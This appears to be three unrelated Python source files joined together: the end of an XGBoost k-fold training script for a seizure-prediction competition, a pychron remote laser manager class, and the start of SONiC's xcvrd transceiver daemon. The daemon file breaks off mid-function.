print('Check error value: {:.6f}'.format(score))
imp = get_importance(gbm, features)
print('Importance array: ', imp)
print("Predict test set...")
test_prediction = gbm.predict(xgb.DMatrix(X_test), ntree_limit=gbm.best_iteration+1)
print('Training time: {} minutes'.format(round((time.time() - start_time)/60, 2)))
return test_prediction.tolist(), score
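# Descriptive note (added comment): run_kfold repeats the same XGBoost training as run_single
# across n folds, again splitting on unique sequence_id values. Out-of-fold predictions are
# collected to compute an overall train AUC, and the final test prediction is the mean of the
# per-fold predictions.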
def run_kfold(nfolds, train, test, features, target, random_state=2016):
eta = 0.2
max_depth = 3
subsample = 0.7
colsample_bytree = 0.7
start_time = time.time()
print('XGBoost params. ETA: {}, MAX_DEPTH: {}, SUBSAMPLE: {}, COLSAMPLE_BY_TREE: {}'.format(eta, max_depth, subsample, colsample_bytree))
params = {
"objective": "binary:logistic",
"booster" : "gbtree",
"eval_metric": "auc",
"eta": eta,
"tree_method": 'exact',
"max_depth": max_depth,
"subsample": subsample,
"colsample_bytree": colsample_bytree,
"silent": 1,
"seed": random_state,
}
num_boost_round = 1000
early_stopping_rounds = 50
yfull_train = dict()
yfull_test = copy.deepcopy(test[['Id']].astype(object))
unique_sequences = np.array(train['sequence_id'].unique())
kf = KFold(len(unique_sequences), n_folds=nfolds, shuffle=True, random_state=random_state)
num_fold = 0
for train_seq_index, test_seq_index in kf:
num_fold += 1
print('Start fold {} from {}'.format(num_fold, nfolds))
train_seq = unique_sequences[train_seq_index]
valid_seq = unique_sequences[test_seq_index]
print('Length of train sequences: {}'.format(len(train_seq)))
print('Length of valid sequences: {}'.format(len(valid_seq)))
X_train, X_valid = train[train['sequence_id'].isin(train_seq)][features], train[train['sequence_id'].isin(valid_seq)][features]
y_train, y_valid = train[train['sequence_id'].isin(train_seq)][target], train[train['sequence_id'].isin(valid_seq)][target]
X_test = test[features]
print('Length train:', len(X_train))
print('Length valid:', len(X_valid))
dtrain = xgb.DMatrix(X_train, y_train)
dvalid = xgb.DMatrix(X_valid, y_valid)
watchlist = [(dtrain, 'train'), (dvalid, 'eval')]
gbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist, early_stopping_rounds=early_stopping_rounds, verbose_eval=1000)
yhat = gbm.predict(xgb.DMatrix(X_valid), ntree_limit=gbm.best_iteration+1)
# Each time store portion of predicted data in train predicted values
for i in range(len(X_valid.index)):
yfull_train[X_valid.index[i]] = yhat[i]
print("Validating...")
check = gbm.predict(xgb.DMatrix(X_valid), ntree_limit=gbm.best_iteration+1)
score = roc_auc_score(y_valid.tolist(), check)
print('Check error value: {:.6f}'.format(score))
imp = get_importance(gbm, features)
print('Importance array: ', imp)
print("Predict test set...")
test_prediction = gbm.predict(xgb.DMatrix(X_test), ntree_limit=gbm.best_iteration+1)
yfull_test['kfold_' + str(num_fold)] = test_prediction
# Copy dict to list
train_res = []
for i in range(len(train.index)):
train_res.append(yfull_train[i])
score = roc_auc_score(train[target], np.array(train_res))
print('Check error value: {:.6f}'.format(score))
# Find mean for KFolds on test
merge = []
for i in range(1, nfolds+1):
merge.append('kfold_' + str(i))
yfull_test['mean'] = yfull_test[merge].mean(axis=1)
print('Training time: {} minutes'.format(round((time.time() - start_time)/60, 2)))
return yfull_test['mean'].values, score
def create_submission(score, test, prediction):
# Make Submission
now = datetime.datetime.now()
sub_file = 'submission_' + str(score) + '_' + str(now.strftime("%Y-%m-%d-%H-%M")) + '.csv'
print('Writing submission: ', sub_file)
f = open(sub_file, 'w')
f.write('File,Class\n')
total = 0
for id in test['Id']:
patient = id // 100000
fid = id % 100000
str1 = 'new_' + str(patient) + '_' + str(fid) + '.mat' + ',' + str(prediction[total])
str1 += '\n'
total += 1
f.write(str1)
f.close()
def get_features(train, test):
trainval = list(train.columns.values)
testval = list(test.columns.values)
output = intersect(trainval, testval)
output.remove('Id')
# output.remove('file_size')
return sorted(output)
def read_test_train():
print("Load train.csv...")
train1 = pd.read_csv("simple_train_1.csv")
train2 = pd.read_csv("simple_train_2.csv")
train3 = pd.read_csv("simple_train_3.csv")
train = pd.concat([train1, train2, train3])
# Remove all zeroes files
train = train[train['file_size'] > 55000].copy()
# Shuffle rows since they are ordered
train = train.iloc[np.random.permutation(len(train))]
# Reset broken index
train = train.reset_index()
print("Load test.csv...")
test1 = pd.read_csv("simple_test_1.csv")
test2 = pd.read_csv("simple_test_2.csv")
test3 = pd.read_csv("simple_test_3.csv")
test = pd.concat([test1, test2, test3])
print("Process tables...")
features = get_features(train, test)
return train, test, features
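# Descriptive note (added comment): the __main__ block first builds the per-patient CSVs in six
# parallel processes (train and test for patients 1-3), then loads and merges them, trains the
# 5-fold model, and writes a submission file whose name includes the out-of-fold train AUC.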
if __name__ == '__main__':
print('XGBoost: {}'.format(xgb.__version__))
if 1:
# Do reading and processing of MAT files in parallel
p = dict()
p[1] = Process(target=create_simple_csv_train, args=(1,))
p[1].start()
p[2] = Process(target=create_simple_csv_train, args=(2,))
p[2].start()
p[3] = Process(target=create_simple_csv_train, args=(3,))
p[3].start()
p[4] = Process(target=create_simple_csv_test, args=(1,))
p[4].start()
p[5] = Process(target=create_simple_csv_test, args=(2,))
p[5].start()
p[6] = Process(target=create_simple_csv_test, args=(3,))
p[6].start()
p[1].join()
p[2].join()
p[3].join()
p[4].join()
p[5].join()
p[6].join()
train, test, features = read_test_train()
print('Length of train: ', len(train))
print('Length of test: ', len(test))
print('Features [{}]: {}'.format(len(features), sorted(features)))
# test_prediction, score = run_single(train, test, features, 'result')
test_prediction, score = run_kfold(5, train, test, features, 'result')
create_submission(score, test, test_prediction)
|
remote_laser_manager.py
|
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from traits.api import Float, Property, Bool, Button, String, Enum
from pychron.core.ui.thread import Thread
from pychron.globals import globalv
from pychron.lasers.laser_managers.base_lase_manager import BaseLaserManager
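# Descriptive note (added comment): RemoteLaserManager is a base class for laser managers driven
# over a network connection. Subclasses must implement open(), and setup_communicator() is
# expected to come from the base class or a subclass; this class supplies the shared traits
# (position, firing state, move-enable toggles) and the button/event handlers that drive them.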
class RemoteLaserManager(BaseLaserManager):
position = String(enter_set=True, auto_set=False)
x = Property(depends_on="_x")
y = Property(depends_on="_y")
z = Property(depends_on="_z")
_x = Float
_y = Float
_z = Float
connected = Bool
test_connection_button = Button("Test Connection")
snapshot_button = Button("Test Snapshot")
use_autocenter = Bool(False)
output_power = Float(enter_set=True, auto_set=False)
fire_laser_button = Button
fire_label = Property(depends_on="_firing")
units = Enum("watts", "percent")
_patterning = False
_firing = Bool(False)
_is_moving = Bool(False)
stage_stop_button = Button("Stage Stop")
move_enabled_button = Button("Enable Move")
move_enabled_label = Property(depends_on="_move_enabled")
_move_enabled = Bool(False)
update_position_button = Button
def open(self, *args, **kw):
raise NotImplementedError
def opened(self):
self.debug("opened")
if self.update_position():
self._opened_hook()
return True
def update_position(self):
pos = super(RemoteLaserManager, self).update_position()
if pos:
self.trait_set(**dict(zip(("_x", "_y", "_z"), pos)))
return True
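# Hedged example (illustrative values): if the hardware reports pos = (1.0, 2.0, 0.5),
# the trait_set call above maps it onto the shadow traits, i.e. _x=1.0, _y=2.0, _z=0.5.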
# private
def _update_position_button_fired(self):
if not self.simulation:
self.update_position()
def _test_connection_button_fired(self):
self.test_connection()
if self.connected:
self.opened()
def _test_connection_hook(self):
pass
def _test_connection(self):
if self.simulation:
return globalv.communication_simulation, None
else:
self.connected = False
if self.setup_communicator():
self._test_connection_hook()
self.debug("test connection. connected= {}".format(self.connected))
return self.connected, None
def _position_changed(self):
if self.position is not None:
t = Thread(
target=self._move_to_position, args=(self.position, self.use_autocenter)
)
t.start()
self._position_thread = t
def _enable_fired(self):
if self.enabled:
self.disable_laser()
self.enabled = False
else:
if self.enable_laser():
self.enabled = True
def _get_move_enabled_label(self):
return "Enable Axis Moves" if not self._move_enabled else "Disable Axis Moves"
def _get_fire_label(self):
return "Fire" if not self._firing else "Stop"
def _move_enabled_button_fired(self):
self._move_enabled = not self._move_enabled
def _opened_hook(self):
pass
def _get_x(self):
return self._x
def _get_y(self):
return self._y
def _get_z(self):
return self._z
# ============= EOF =============================================
|
xcvrd.py
|
#!/usr/bin/env python2
"""
xcvrd
Transceiver information update daemon for SONiC
"""
try:
import ast
import json
import multiprocessing
import os
import signal
import sys
import threading
import time
from enum import Enum
from sonic_py_common import daemon_base, device_info, logger
from sonic_py_common import multi_asic
from swsscommon import swsscommon
from .xcvrd_utilities import y_cable_helper
except ImportError as e:
raise ImportError(str(e) + " - required module not found")
#
# Constants ====================================================================
#
SYSLOG_IDENTIFIER = "xcvrd"
PLATFORM_SPECIFIC_MODULE_NAME = "sfputil"
PLATFORM_SPECIFIC_CLASS_NAME = "SfpUtil"
TRANSCEIVER_INFO_TABLE = 'TRANSCEIVER_INFO'
TRANSCEIVER_DOM_SENSOR_TABLE = 'TRANSCEIVER_DOM_SENSOR'
TRANSCEIVER_STATUS_TABLE = 'TRANSCEIVER_STATUS'
SELECT_TIMEOUT_MSECS = 1000
DOM_INFO_UPDATE_PERIOD_SECS = 60
TIME_FOR_SFP_READY_SECS = 1
XCVRD_MAIN_THREAD_SLEEP_SECS = 60
# SFP status definition, shall be aligned with the definition in get_change_event() of ChassisBase
SFP_STATUS_REMOVED = '0'
SFP_STATUS_INSERTED = '1'
# SFP error code enum, new elements can be added to the enum if new errors need to be supported.
SFP_STATUS_ERR_ENUM = Enum('SFP_STATUS_ERR_ENUM', ['SFP_STATUS_ERR_I2C_STUCK', 'SFP_STATUS_ERR_BAD_EEPROM',
'SFP_STATUS_ERR_UNSUPPORTED_CABLE', 'SFP_STATUS_ERR_HIGH_TEMP',
'SFP_STATUS_ERR_BAD_CABLE'], start=2)
# Convert the error code to string and store them in a set for convenience
errors_block_eeprom_reading = set(str(error_code.value) for error_code in SFP_STATUS_ERR_ENUM)
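# Hedged example: with the enum above starting at 2, this set evaluates to
# {'2', '3', '4', '5', '6'}.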
EVENT_ON_ALL_SFP = '-1'
# events definition
SYSTEM_NOT_READY = 'system_not_ready'
SYSTEM_BECOME_READY = 'system_become_ready'
SYSTEM_FAIL = 'system_fail'
NORMAL_EVENT = 'normal'
# states definition
STATE_INIT = 0
STATE_NORMAL = 1
STATE_EXIT = 2
PHYSICAL_PORT_NOT_EXIST = -1
SFP_EEPROM_NOT_READY = -2
SFPUTIL_LOAD_ERROR = 1
PORT_CONFIG_LOAD_ERROR = 2
NOT_IMPLEMENTED_ERROR = 3
SFP_SYSTEM_ERROR = 4
RETRY_TIMES_FOR_SYSTEM_READY = 24
RETRY_PERIOD_FOR_SYSTEM_READY_MSECS = 5000
RETRY_TIMES_FOR_SYSTEM_FAIL = 24
RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS = 5000
TEMP_UNIT = 'C'
VOLT_UNIT = 'Volts'
POWER_UNIT = 'dBm'
BIAS_UNIT = 'mA'
media_settings = ''
g_dict = {}
# Global platform specific sfputil class instance
platform_sfputil = None
# Global chassis object based on new platform api
platform_chassis = None
# Global logger instance for helper functions and classes
# TODO: Refactor so that we only need the logger inherited
# by DaemonXcvrd
helper_logger = logger.Logger(SYSLOG_IDENTIFIER)
#
# Helper functions =============================================================
#
# Find the underlying physical port list for a logical port name
def logical_port_name_to_physical_port_list(port_name):
try:
return [int(port_name)]
except ValueError:
if platform_sfputil.is_logical_port(port_name):
return platform_sfputil.get_logical_to_physical(port_name)
else:
helper_logger.log_error("Invalid port '{}'".format(port_name))
return None
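# Hedged examples (port names are illustrative, not from a real port_config):
#   logical_port_name_to_physical_port_list("5")         -> [5]
#   logical_port_name_to_physical_port_list("Ethernet0") -> e.g. [1]
#   an unknown logical name logs an error and returns None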
# Get physical port name
def get_physical_port_name(logical_port, physical_port, ganged):
if logical_port == physical_port:
return logical_port
elif ganged:
return logical_port + ":{} (ganged)".format(physical_port)
else:
return logical_port
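# Hedged example: for a ganged (multi-member) port the member index is appended,
# e.g. get_physical_port_name("Ethernet0", 2, True) -> "Ethernet0:2 (ganged)";
# otherwise the logical name is returned unchanged.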
# Strip units and beautify
def strip_unit_and_beautify(value, unit):
# Strip unit from raw data
if type(value) is str:
width = len(unit)
if value[-width:] == unit:
value = value[:-width]
return value
else:
return str(value)
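# Hedged example: strip_unit_and_beautify('25.78C', TEMP_UNIT) -> '25.78',
# while a numeric input such as 3.3 is simply stringified to '3.3'.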
def _wrapper_get_presence(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_presence()
except NotImplementedError:
pass
return platform_sfputil.get_presence(physical_port)
def _wrapper_is_replaceable(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).is_replaceable()
except NotImplementedError:
pass
return False
def _wrapper_get_transceiver_info(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_transceiver_info()
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_info_dict(physical_port)
def _wrapper_get_transceiver_dom_info(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_transceiver_bulk_status()
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_dom_info_dict(physical_port)
def _wrapper_get_transceiver_dom_threshold_info(physical_port):
if platform_chassis is not None:
try:
return platform_chassis.get_sfp(physical_port).get_transceiver_threshold_info()
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_dom_threshold_info_dict(physical_port)
def _wrapper_get_transceiver_change_event(timeout):
if platform_chassis is not None:
try:
status, events = platform_chassis.get_change_event(timeout)
sfp_events = events['sfp']
return status, sfp_events
except NotImplementedError:
pass
return platform_sfputil.get_transceiver_change_event(timeout)
def _wrapper_get_sfp_type(physical_port):
if platform_chassis:
try:
return platform_chassis.get_sfp(physical_port).sfp_type
except (NotImplementedError, AttributeError):
pass
return None
# Remove unnecessary unit from the raw data
def beautify_dom_info_dict(dom_info_dict):
dom_info_dict['temperature'] = strip_unit_and_beautify(dom_info_dict['temperature'], TEMP_UNIT)
dom_info_dict['voltage'] = strip_unit_and_beautify(dom_info_dict['voltage'], VOLT_UNIT)
dom_info_dict['rx1power'] = strip_unit_and_beautify(dom_info_dict['rx1power'], POWER_UNIT)
dom_info_dict['rx2power'] = strip_unit_and_beautify(dom_info_dict['rx2power'], POWER_UNIT)
dom_info_dict['rx3power'] = strip_unit_and_beautify(dom_info_dict['rx3power'], POWER_UNIT)
dom_info_dict['rx4power'] = strip_unit_and_beautify(dom_info_dict['rx4power'], POWER_UNIT)
dom_info_dict['tx1bias'] = strip_unit_and_beautify(dom_info_dict['tx1bias'], BIAS_UNIT)
dom_info_dict['tx2bias'] = strip_unit_and_beautify(dom_info_dict['tx2bias'], BIAS_UNIT)
dom_info_dict['tx3bias'] = strip_unit_and_beautify(dom_info_dict['tx3bias'], BIAS_UNIT)
dom_info_dict['tx4bias'] = strip_unit_and_beautify(dom_info_dict['tx4bias'], BIAS_UNIT)
dom_info_dict['tx1power'] = strip_unit_and_beautify(dom_info_dict['tx1power'], POWER_UNIT)
dom_info_dict['tx2power'] = strip_unit_and_beautify(dom_info_dict['tx2power'], POWER_UNIT)
dom_info_dict['tx3power'] = strip_unit_and_beautify(dom_info_dict['tx3power'], POWER_UNIT)
dom_info_dict['tx4power'] = strip_unit_and_beautify(dom_info_dict['tx4power'], POWER_UNIT)
def beautify_dom_threshold_info_dict(dom_info_dict):
dom_info_dict['temphighalarm'] = strip_unit_and_beautify(dom_info_dict['temphighalarm'], TEMP_UNIT)
dom_info_dict['temphighwarning'] = strip_unit_and_beautify(dom_info_dict['temphighwarning'], TEMP_UNIT)
dom_info_dict['templowalarm'] = strip_unit_and_beautify(dom_info_dict['templowalarm'], TEMP_UNIT)
dom_info_dict['templowwarning'] = strip_unit_and_beautify(dom_info_dict['templowwarning'], TEMP_UNIT)
dom_info_dict['vcchighalarm'] = strip_unit_and_beautify(dom_info_dict['vcchighalarm'], VOLT_UNIT)
dom_info_dict['vcchighwarning'] = strip_unit_and_beautify(dom_info_dict['vcchighwarning'], VOLT_UNIT)
dom_info_dict['vcclowalarm'] = strip_unit_and_beautify(dom_info_dict['vcclowalarm'], VOLT_UNIT)
dom_info_dict['vcclowwarning'] = strip_unit_and_beautify(dom_info_dict['vcclowwarning'], VOLT_UNIT)
dom_info_dict['txpowerhighalarm'] = strip_unit_and_beautify(dom_info_dict['txpowerhighalarm'], POWER_UNIT)
dom_info_dict['txpowerlowalarm'] = strip_unit_and_beautify(dom_info_dict['txpowerlowalarm'], POWER_UNIT)
dom_info_dict['txpowerhighwarning'] = strip_unit_and_beautify(dom_info_dict['txpowerhighwarning'], POWER_UNIT)
dom_info_dict['txpowerlowwarning'] = strip_unit_and_beautify(dom_info_dict['txpowerlowwarning'], POWER_UNIT)
dom_info_dict['rxpowerhighalarm'] = strip_unit_and_beautify(dom_info_dict['rxpowerhighalarm'], POWER_UNIT)
dom_info_dict['rxpowerlowalarm'] = strip_unit_and_beautify(dom_info_dict['rxpowerlowalarm'], POWER_UNIT)
dom_info_dict['rxpowerhighwarning'] = strip_unit_and_beautify(dom_info_dict['rxpowerhighwarning'], POWER_UNIT)
dom_info_dict['rxpowerlowwarning'] = strip_unit_and_beautify(dom_info_dict['rxpowerlowwarning'], POWER_UNIT)
dom_info_dict['txbiashighalarm'] = strip_unit_and_beautify(dom_info_dict['txbiashighalarm'], BIAS_UNIT)
dom_info_dict['txbiaslowalarm'] = strip_unit_and_beautify(dom_info_dict['txbiaslowalarm'], BIAS_UNIT)
dom_info_dict['txbiashighwarning'] = strip_unit_and_beautify(dom_info_dict['txbiashighwarning'], BIAS_UNIT)
dom_info_dict['txbiaslowwarning'] = strip_unit_and_beautify(dom_info_dict['txbiaslowwarning'], BIAS_UNIT)
# Update port sfp info in db
def post_port_sfp_info_to_db(logical_port_name, table, transceiver_dict,
stop_event=threading.Event()):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
if stop_event.is_set():
break
if not _wrapper_get_presence(physical_port):
continue
port_name = get_physical_port_name(logical_port_name, ganged_member_num, ganged_port)
ganged_member_num += 1
try:
port_info_dict = _wrapper_get_transceiver_info(physical_port)
if port_info_dict is not None:
is_replaceable = _wrapper_is_replaceable(physical_port)
transceiver_dict[physical_port] = port_info_dict
fvs = swsscommon.FieldValuePairs(
[('type', port_info_dict['type']),
('hardware_rev', port_info_dict['hardware_rev']),
('serial', port_info_dict['serial']),
('manufacturer', port_info_dict['manufacturer']),
('model', port_info_dict['model']),
('vendor_oui', port_info_dict['vendor_oui']),
('vendor_date', port_info_dict['vendor_date']),
('connector', port_info_dict['connector']),
('encoding', port_info_dict['encoding']),
('ext_identifier', port_info_dict['ext_identifier']),
('ext_rateselect_compliance', port_info_dict['ext_rateselect_compliance']),
('cable_type', port_info_dict['cable_type']),
('cable_length', port_info_dict['cable_length']),
('specification_compliance', port_info_dict['specification_compliance']),
('nominal_bit_rate', port_info_dict['nominal_bit_rate']),
('application_advertisement', port_info_dict['application_advertisement']
if 'application_advertisement' in port_info_dict else 'N/A'),
('is_replaceable', str(is_replaceable)),
('dom_capability', port_info_dict['dom_capability']
if 'dom_capability' in port_info_dict else 'N/A'),
])
table.set(port_name, fvs)
else:
return SFP_EEPROM_NOT_READY
except NotImplementedError:
helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# Update port dom threshold info in db
def post_port_dom_threshold_info_to_db(logical_port_name, table,
stop=threading.Event()):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
if stop.is_set():
break
if not _wrapper_get_presence(physical_port):
continue
port_name = get_physical_port_name(logical_port_name,
ganged_member_num, ganged_port)
ganged_member_num += 1
try:
dom_info_dict = _wrapper_get_transceiver_dom_threshold_info(physical_port)
if dom_info_dict is not None:
beautify_dom_threshold_info_dict(dom_info_dict)
fvs = swsscommon.FieldValuePairs(
[('temphighalarm', dom_info_dict['temphighalarm']),
('temphighwarning', dom_info_dict['temphighwarning']),
('templowalarm', dom_info_dict['templowalarm']),
('templowwarning', dom_info_dict['templowwarning']),
('vcchighalarm', dom_info_dict['vcchighalarm']),
('vcchighwarning', dom_info_dict['vcchighwarning']),
('vcclowalarm', dom_info_dict['vcclowalarm']),
('vcclowwarning', dom_info_dict['vcclowwarning']),
('txpowerhighalarm', dom_info_dict['txpowerhighalarm']),
('txpowerlowalarm', dom_info_dict['txpowerlowalarm']),
('txpowerhighwarning', dom_info_dict['txpowerhighwarning']),
('txpowerlowwarning', dom_info_dict['txpowerlowwarning']),
('rxpowerhighalarm', dom_info_dict['rxpowerhighalarm']),
('rxpowerlowalarm', dom_info_dict['rxpowerlowalarm']),
('rxpowerhighwarning', dom_info_dict['rxpowerhighwarning']),
('rxpowerlowwarning', dom_info_dict['rxpowerlowwarning']),
('txbiashighalarm', dom_info_dict['txbiashighalarm']),
('txbiaslowalarm', dom_info_dict['txbiaslowalarm']),
('txbiashighwarning', dom_info_dict['txbiashighwarning']),
('txbiaslowwarning', dom_info_dict['txbiaslowwarning'])
])
table.set(port_name, fvs)
else:
return SFP_EEPROM_NOT_READY
except NotImplementedError:
helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# Update port dom sensor info in db
def post_port_dom_info_to_db(logical_port_name, table, stop_event=threading.Event()):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
if stop_event.is_set():
break
if not _wrapper_get_presence(physical_port):
continue
port_name = get_physical_port_name(logical_port_name, ganged_member_num, ganged_port)
ganged_member_num += 1
try:
dom_info_dict = _wrapper_get_transceiver_dom_info(physical_port)
if dom_info_dict is not None:
beautify_dom_info_dict(dom_info_dict)
if _wrapper_get_sfp_type(physical_port) == 'QSFP_DD':
fvs = swsscommon.FieldValuePairs(
[('temperature', dom_info_dict['temperature']),
('voltage', dom_info_dict['voltage']),
('rx1power', dom_info_dict['rx1power']),
('rx2power', dom_info_dict['rx2power']),
('rx3power', dom_info_dict['rx3power']),
('rx4power', dom_info_dict['rx4power']),
('rx5power', dom_info_dict['rx5power']),
('rx6power', dom_info_dict['rx6power']),
('rx7power', dom_info_dict['rx7power']),
('rx8power', dom_info_dict['rx8power']),
('tx1bias', dom_info_dict['tx1bias']),
('tx2bias', dom_info_dict['tx2bias']),
('tx3bias', dom_info_dict['tx3bias']),
('tx4bias', dom_info_dict['tx4bias']),
('tx5bias', dom_info_dict['tx5bias']),
('tx6bias', dom_info_dict['tx6bias']),
('tx7bias', dom_info_dict['tx7bias']),
('tx8bias', dom_info_dict['tx8bias']),
('tx1power', dom_info_dict['tx1power']),
('tx2power', dom_info_dict['tx2power']),
('tx3power', dom_info_dict['tx3power']),
('tx4power', dom_info_dict['tx4power']),
('tx5power', dom_info_dict['tx5power']),
('tx6power', dom_info_dict['tx6power']),
('tx7power', dom_info_dict['tx7power']),
('tx8power', dom_info_dict['tx8power'])
])
else:
fvs = swsscommon.FieldValuePairs(
[('temperature', dom_info_dict['temperature']),
('voltage', dom_info_dict['voltage']),
('rx1power', dom_info_dict['rx1power']),
('rx2power', dom_info_dict['rx2power']),
('rx3power', dom_info_dict['rx3power']),
('rx4power', dom_info_dict['rx4power']),
('tx1bias', dom_info_dict['tx1bias']),
('tx2bias', dom_info_dict['tx2bias']),
('tx3bias', dom_info_dict['tx3bias']),
('tx4bias', dom_info_dict['tx4bias']),
('tx1power', dom_info_dict['tx1power']),
('tx2power', dom_info_dict['tx2power']),
('tx3power', dom_info_dict['tx3power']),
('tx4power', dom_info_dict['tx4power'])
])
table.set(port_name, fvs)
else:
return SFP_EEPROM_NOT_READY
except NotImplementedError:
helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# Update port dom/sfp info in db
def post_port_sfp_dom_info_to_db(is_warm_start, stop_event=threading.Event()):
# Connect to STATE_DB and create transceiver dom/sfp info tables
transceiver_dict, state_db, appl_db, int_tbl, dom_tbl, app_port_tbl = {}, {}, {}, {}, {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
int_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_INFO_TABLE)
dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
app_port_tbl[asic_id] = swsscommon.ProducerStateTable(appl_db[asic_id], swsscommon.APP_PORT_TABLE_NAME)
# Post all the current interface dom/sfp info to STATE_DB
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
post_port_sfp_info_to_db(logical_port_name, int_tbl[asic_index], transceiver_dict, stop_event)
post_port_dom_info_to_db(logical_port_name, dom_tbl[asic_index], stop_event)
post_port_dom_threshold_info_to_db(logical_port_name, dom_tbl[asic_index], stop_event)
# Do not notify media settings during warm reboot to avoid dataplane traffic impact
if not is_warm_start:
notify_media_setting(logical_port_name, transceiver_dict, app_port_tbl[asic_index])
transceiver_dict.clear()
# Delete port dom/sfp info from db
def del_port_sfp_dom_info_from_db(logical_port_name, int_tbl, dom_tbl):
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
port_name = get_physical_port_name(logical_port_name, ganged_member_num, ganged_port)
ganged_member_num += 1
try:
if int_tbl is not None:
int_tbl._del(port_name)
if dom_tbl is not None:
dom_tbl._del(port_name)
except NotImplementedError:
helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# recover missing sfp table entries if any
def recover_missing_sfp_table_entries(sfp_util, int_tbl, status_tbl, stop_event):
transceiver_dict = {}
logical_port_list = sfp_util.logical
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = sfp_util.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
keys = int_tbl[asic_index].getKeys()
if logical_port_name not in keys and not detect_port_in_error_status(logical_port_name, status_tbl[asic_index]):
post_port_sfp_info_to_db(logical_port_name, int_tbl[asic_index], transceiver_dict, stop_event)
def check_port_in_range(range_str, physical_port):
RANGE_SEPARATOR = '-'
range_list = range_str.split(RANGE_SEPARATOR)
start_num = int(range_list[0].strip())
end_num = int(range_list[1].strip())
if start_num <= physical_port <= end_num:
return True
return False
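# Hedged example: check_port_in_range('1-32', 7) -> True, check_port_in_range('1-32', 40) -> False.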
def get_media_settings_value(physical_port, key):
GLOBAL_MEDIA_SETTINGS_KEY = 'GLOBAL_MEDIA_SETTINGS'
PORT_MEDIA_SETTINGS_KEY = 'PORT_MEDIA_SETTINGS'
DEFAULT_KEY = 'Default'
RANGE_SEPARATOR = '-'
COMMA_SEPARATOR = ','
media_dict = {}
default_dict = {}
# Keys under global media settings can be a list or range or list of ranges
# of physical port numbers. Below are some examples
# 1-32
# 1,2,3,4,5
# 1-4,9-12
if GLOBAL_MEDIA_SETTINGS_KEY in g_dict:
for keys in g_dict[GLOBAL_MEDIA_SETTINGS_KEY]:
if COMMA_SEPARATOR in keys:
port_list = keys.split(COMMA_SEPARATOR)
for port in port_list:
if RANGE_SEPARATOR in port:
if check_port_in_range(port, physical_port):
media_dict = g_dict[GLOBAL_MEDIA_SETTINGS_KEY][keys]
break
elif str(physical_port) == port:
media_dict = g_dict[GLOBAL_MEDIA_SETTINGS_KEY][keys]
break
elif RANGE_SEPARATOR in keys:
if check_port_in_range(keys, physical_port):
media_dict = g_dict[GLOBAL_MEDIA_SETTINGS_KEY][keys]
# If there is a match in the global profile for a media type,
# fetch those values
if key[0] in media_dict:
return media_dict[key[0]]
elif key[1] in media_dict:
return media_dict[key[1]]
elif DEFAULT_KEY in media_dict:
default_dict = media_dict[DEFAULT_KEY]
media_dict = {}
if PORT_MEDIA_SETTINGS_KEY in g_dict:
for keys in g_dict[PORT_MEDIA_SETTINGS_KEY]:
if int(keys) == physical_port:
media_dict = g_dict[PORT_MEDIA_SETTINGS_KEY][keys]
break
if len(media_dict) == 0:
if len(default_dict) != 0:
return default_dict
else:
